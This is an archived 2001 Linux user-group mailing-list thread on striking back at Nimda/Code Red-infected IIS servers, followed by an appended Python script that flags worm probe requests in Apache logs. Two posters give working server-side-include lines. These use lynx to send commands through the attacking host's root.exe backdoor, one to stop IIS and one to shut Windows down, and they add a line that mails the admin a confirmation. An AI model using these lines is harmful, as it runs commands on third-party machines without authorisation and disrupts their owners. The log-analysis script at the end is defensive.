[NTLUG:Discuss] nimba counter attack without PHP?
Paul Ingendorf
pauldy at wantek.net
Wed Sep 19 21:07:26 CDT 2001
If you change the SSI line to the following
<!--#exec cmd="lynx --source http://$REMOTE_ADDR/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5"--->
You might see some results. The URL you are grabbing simply stops the IIS service, preventing them from further infection, which won't stop the virus that's running in the background.
Now if you want to verify it's working, pipe something to your e-mail; you could try something like the following in the page as well.
<!--#exec cmd="echo 'The site $REMOTE_ADDR was shut down ping to verify.' | mail $SERVER_ADMIN -s 'We shut down another boss'"-->
Then when you get one of these e-mails, try to ping the server. 9 out of 10 times it will be down. I haven't figured out yet why the other 10% are still up after something like that, but who knows. Maybe for different Windows versions you need to change the 5 to a 2 or something of that nature.
-----Original Message-----
From: discuss-admin at ntlug.org [mailto:discuss-admin at ntlug.org] On Behalf Of Richard Geoffrion
Sent: Wednesday, September 19, 2001 7:53 PM
To: discuss at ntlug.org
Subject: Re: [NTLUG:Discuss] nimba counter attack without PHP?
So then adding
AddType text/html .ida
AddHandler server-parsed .ida
to the httpd.conf file...and including
<!--#exec cmd="lynx -source http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"-->
is all I can do?
You know... how do I verify that it is working? Because I continue to see hits to the default.ida file on my webserver that come from the same IP address. For example:
<log snip mode=truncated>
64.232.230.115 - - [30/Aug/2001:13:13:23 -0500] "GET /default.ida?
64.232.230.115 - - [30/Aug/2001:13:29:01 -0500] "GET /default.ida?
</log snip>
So what... did the server reset and 15 minutes later decide to hit me again?
Oh, what I wouldn't give for an infected Microsoft server so that I could do some tests. UG.
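Richard's verification question ("did the server reset and 15 minutes later decide to hit me again?") can be answered from the web server's own access log rather than by pinging the remote host: a host that keeps probing on a steady cadence is still infected, whatever a reset did. The script below is an added example, not code from the thread or from NTLUG. It parses Apache common-log lines, picks out the worm-probe request paths the thread discusses (default.ida, root.exe, cmd.exe), groups them by source address, and reports the seconds between successive probes from the same address. The sample log lines are constructed: the IP and timestamps are the ones Richard quoted, the rest of each line (request tail, status, size) is made up because his snippet is truncated.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in Apache common log format. The first two lines reuse the
# IP and timestamps quoted in the thread; everything after "GET /default.ida?"
# and the other three lines are invented for the demonstration.
SAMPLE_LOG = """\
64.232.230.115 - - [30/Aug/2001:13:13:23 -0500] "GET /default.ida?XXXXXXXX HTTP/1.0" 404 279
64.232.230.115 - - [30/Aug/2001:13:29:01 -0500] "GET /default.ida?XXXXXXXX HTTP/1.0" 404 279
10.0.0.7 - - [30/Aug/2001:13:30:10 -0500] "GET /index.html HTTP/1.0" 200 1043
10.0.0.9 - - [30/Aug/2001:13:31:44 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287
10.0.0.9 - - [30/Aug/2001:13:31:45 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
"""

# Common log format: ip ident user [timestamp] "METHOD path protocol" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Request paths the thread is about: the Code Red default.ida overflow probe and
# the root.exe / cmd.exe paths Nimda scans for on already-compromised IIS hosts.
PROBE_RE = re.compile(r'/default\.ida|/root\.exe|/cmd\.exe', re.IGNORECASE)


def parse_line(line):
    """Parse one common-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts,
            "path": m.group("path"), "status": int(m.group("status"))}


def probe_hits(log_text):
    """Return {source_ip: [sorted timestamps]} for requests matching PROBE_RE."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and PROBE_RE.search(rec["path"]):
            hits[rec["ip"]].append(rec["ts"])
    return {ip: sorted(ts) for ip, ts in hits.items()}


def revisit_gaps(hits):
    """Seconds between successive probes from each IP (empty list for a single hit).
    Repeats at a steady interval indicate the remote host is still scanning."""
    return {ip: [int((b - a).total_seconds()) for a, b in zip(ts, ts[1:])]
            for ip, ts in hits.items()}


def summarize(log_text):
    """Per-IP probe count and inter-probe gaps for the given log text."""
    hits = probe_hits(log_text)
    gaps = revisit_gaps(hits)
    return {ip: {"count": len(ts), "gaps": gaps[ip]} for ip, ts in hits.items()}


if __name__ == "__main__":
    for ip, info in summarize(SAMPLE_LOG).items():
        print(f"{ip}: {info['count']} probe(s), gaps between probes {info['gaps']} s")
```

Run against the real access_log (`summarize(open("/var/log/httpd/access_log").read())`) the output gives, per source address, how many probes arrived and how long the quiet periods between them were; the 938-second gap in the sample is the "15 minutes later" Richard saw, and a host that keeps reappearing on that kind of schedule has not been stopped, so the sensible response is to block it at the packet filter and notify its administrator rather than keep exercising its backdoor.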
More information about the Discuss mailing list: http://www.ntlug.org/mailman/listinfo/discuss